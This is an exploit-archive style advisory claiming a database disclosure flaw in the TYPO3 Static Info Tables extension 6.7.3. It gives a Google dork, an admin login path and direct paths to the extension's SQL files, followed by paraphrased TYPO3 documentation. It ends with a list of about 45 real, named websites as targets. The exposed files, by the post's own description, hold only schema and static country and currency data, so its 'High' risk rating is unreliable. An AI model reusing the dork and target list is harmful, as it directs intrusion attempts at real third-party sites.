Typo3 Static Info Tables Extension 6.7.3 Database Disclosure

1. #################################################################################################
2.  
3. # Exploit Title : Typo3 CMS Static Info Tables Extension 6.7.3 Database Disclosure
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 02/01/2019
6. # Vendor Homepage : typo3.org - extensions.typo3.org/extension/static_info_tables/
7. # Software Download Link : extensions.typo3.org/extension/download/static_info_tables/6.7.3/zip/
8. + github.com/lsv/sas/tree/master/typo3conf/ext/static_info_tables
9. # Tested On : Windows and Linux
10. # Category : WebApps
11. # Version Information : 6.7.3
12. # Exploit Risk : High
13. # Google Dorks : inurl:''/typo3conf/ext/static_info_tables/''
14. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
15. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
16. # CxSecurity Exploit Reference Link :
17. cxsecurity.com/issue/WLB-2019010029
18. # PacketStormSecurity Exploit Reference Link :
19. packetstormsecurity.com/files/150985/Typo3-CMS-Static-Info-Tables-6.7.3-Database-Disclosure.html
20.  
21. #################################################################################################
22.  
23. # Admin Panel Login Path :
24.  
25. /typo3/index.php
26.  
27. # Exploit :
28.  
29. /typo3conf/ext/static_info_tables/ext_tables.sql
30.  
31. /typo3conf/ext/static_info_tables/ext_tables_static+adt.sql
32.  
33. /typo3conf/ext/static_info_tables/ext_tables_static+adt-orig.sql
34.  
35. #################################################################################################
36.  
37. # Information About Typo3 Database [ ext_tables.sql - ext_tables_static+adt.sql ] =>
38. ***********************************************************************
39.  
40. The preparation of the database primarily covers the creation of the database tables.
41.  
42. The commands for the creation are done in SQL.
43.  
44. The code is put into the file ext_tables.sql which itself is located on the top level of the extension directory.
45.  
46. One of the main purposes of Extbase is to abstract the access of the underlying persistence solution.
47.  
48. Thus, you normally won't get in touch with native SQL-Queries in day-to-day development,
49.  
50. especially when you let the kickstarter auto-generate your database table.
51.  
52. The table's name is derived from the Extbase convention which describes that class names
53.  
54. are written in lowercase retaining the underlines.
55.  
56. The file ext_tables.sql is executed whenever the extension is installed. Nevertheless,
57.  
58. TYPO3 is smart enough not to overwrite an existing database table. On the contrary it deduces
59.  
60. the differences between the new and the existing table and just adds those additional information.
61.  
62. TYPO3 is usually used with the database engine MySQL which additionally
63.  
64. provides the developer with the field types mediumtext and longtext.
65.  
66. ext_tables.sql (optional)
67. ********************
68.  
69. This file contains SQL statements to update or create tables for your extension in the TYPO3 database.
70.  
71. This file should contain a table structure dump of the tables used by the extension.
72.  
73. It is used for evaluation of the database structure and is therefore important to check and update
74.  
75. the database when an extension is enabled. If you add additional fields (or depend on certain fields)
76.  
77. to existing tables, you can also put them here. In that case, insert a CREATE TABLE structure
78.  
79. for that table, but remove all lines except the ones defining the fields you need. The ext_tables.sql
80.  
81. file may not necessarily be dumpable directly to MySQL (because of the semi-complete
82.  
83. table definitions allowed defining only required fields.). But the EM or
84.  
85. Install Tool can handle this. The only very important thing is that the syntax of the content
86.  
87. is exactly like MySQL made it so that the parsing and analysis routines of the EM don't get confused.
88.  
89. ext_tables_static+adt.sql (optional)
90. *****************************
91.  
92. Static SQL tables and their data. If the extension requires static data you can dump it into a SQL file of this name.
93.  
94. Example for dumping MySQL data from the shell (assuming you are in the extension directory):
95.  
96. Shell Script
97.  
98. mysqldump --password=[password] [database name] [tablename] --add-drop-table > ./ext_tables_static.sql
99.  
100. --add-drop-table adds DROP TABLE statements, so that any data is inserted into a fresh table.
101.  
102. You can also drop the table content using the EM in the backend.
103.  
104. The table structure of static tables needs to be in the ext_tables.sql file as well -
105.  
106. otherwise an installed static table will be reported as being in excess in the EM!
107.  
108. ext_tables_static+adt-orig.sql
109. ********************************
110.  
111. This file is about TYPO3 Extension Manager dump 1.1 and contains this informations.
112.  
113. # Table structure for table "static_territories"
114.  
115. # Table structure for table "static_countries"
116.  
117. # Table structure for table "static_country_zones"
118.  
119. # Table structure for table "static_currencies"
120.  
121. # Table structure for table "static_languages"
122.  
123. # Table structure for table "static_taxes"
124.  
125. Reference Link [ Summarized By Me ] => wiki.typo3.org/Extension_Developers_Guide
126.  
127. #################################################################################################
128.  
129. # Example Vulnerable Sites =>
130.  
131. [+] abs.org/typo3conf/ext/static_info_tables/ext_tables_static+adt-orig.sql
132.  
133. [+] lapetitemaisondecucuron.com/typo3conf/ext/static_info_tables/ext_tables.sql
134.  
135. [+] gmeinder-lokomotiven.de/typo3conf/ext/static_info_tables/ext_tables.sql
136.  
137. [+] soloboadilla.es/typo3conf/ext/static_info_tables/ext_tables.sql
138.  
139. [+] emergegroup.com/typo3conf/ext/static_info_tables/ext_tables.sql
140.  
141. [+] devega-praesentationsmappen.de/typo3conf/ext/static_info_tables/
142.  
143. [+] hne.ag/typo3conf/ext/static_info_tables/ext_tables.sql
144.  
145. [+] efka.net/typo3conf/ext/static_info_tables/ext_tables.sql
146.  
147. [+] awmp.ch/typo3conf/ext/static_info_tables/ext_tables.sql
148.  
149. [+] kfz-ueberfuehrungen24.de/typo3conf/ext/static_info_tables/ext_tables.sql
150.  
151. [+] dr-myska.de/typo3conf/ext/static_info_tables/ext_tables.sql
152.  
153. [+] zimmerei-unas.de/typo3conf/ext/static_info_tables/ext_tables.sql
154.  
155. [+] condensat.kz/typo3conf/ext/static_info_tables/ext_tables.sql
156.  
157. [+] laruecommunityalliance.org/typo3conf/ext/static_info_tables/ext_tables.sql
158.  
159. [+] lippewelle.de/typo3conf/ext/static_info_tables/ext_tables.sql
160.  
161. [+] oldweb.businesseventsthailand.com/typo3conf/ext/static_info_tables/ext_tables.sql
162.  
163. [+] pflege-krankenhaus.de/typo3conf/ext/static_info_tables/ext_tables.sql
164.  
165. [+] creation-willigeller.com/typo3conf/ext/static_info_tables/ext_tables.sql
166.  
167. [+] kolbus.de/typo3conf/ext/static_info_tables/ext_tables.sql
168.  
169. [+] terreal.com/typo3conf/ext/static_info_tables/ext_tables.sql
170.  
171. [+] zbb.ch/typo3conf/ext/static_info_tables/ext_tables.sql
172.  
173. [+] bexbach.de/typo3conf/ext/static_info_tables/ext_tables.sql
174.  
175. [+] maska.si/typo3conf/ext/static_info_tables/ext_tables.sql
176.  
177. [+] carus-it.com/typo3conf/ext/static_info_tables/ext_tables.sql
178.  
179. [+] kolbus.com/typo3conf/ext/static_info_tables/ext_tables.sql
180.  
181. [+] hfu-campus-tuttlingen.de/typo3conf/ext/static_info_tables/ext_tables.sql
182.  
183. [+] zugersee-schifffahrt.ch/typo3conf/ext/static_info_tables/ext_tables.sql
184.  
185. [+] umweltprofis.at/typo3conf/ext/static_info_tables/ext_tables.sql
186.  
187. [+] mountaininfo.eu/typo3conf/ext/static_info_tables/ext_tables.sql
188.  
189. [+] e-businessconsulting.it/typo3conf/ext/static_info_tables/ext_tables.sql
190.  
191. [+] ninukot.is/typo3conf/ext/static_info_tables/ext_tables.sql
192.  
193. [+] radosina.sk/typo3conf/ext/static_info_tables/ext_tables.sql
194.  
195. [+] cyfra7.com/typo3conf/ext/static_info_tables/ext_tables.sql
196.  
197. [+] kupferdreh.com/typo3conf/ext/static_info_tables/ext_tables.sql
198.  
199. [+] abs.org/typo3conf/ext/static_info_tables/ext_tables.sql
200.  
201. [+] ki.si/typo3conf/ext/static_info_tables/ext_tables.sql
202.  
203. [+] dataplan.de/t3/typo3conf/ext/static_info_tables/ext_tables.sql
204.  
205. [+] usva.nl/typo3conf/ext/static_info_tables/ext_tables.sql
206.  
207. [+] kanumagazin.de/typo3conf/ext/static_info_tables/ext_tables.sql
208.  
209. [+] aegerisee-schifffahrt.ch/typo3conf/ext/static_info_tables/ext_tables.sql
210.  
211. [+] joyce-meyer.nl/typo3conf/ext/static_info_tables/ext_tables.sql
212.  
213. [+] iholdi-oztibarre.com/typo3conf/ext/static_info_tables/ext_tables.sql
214.  
215. [+] bulac.fr/typo3conf/ext/static_info_tables/ext_tables.sql
216.  
217. [+] kolbus.de/typo3conf/ext/static_info_tables/ext_tables.sql
218.  
219. [+] pitpit.eu/typo3conf/ext/static_info_tables//ext_tables_static+adt.sql
220.  
221. #################################################################################################
222.  
223. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
224.  
225. #################################################################################################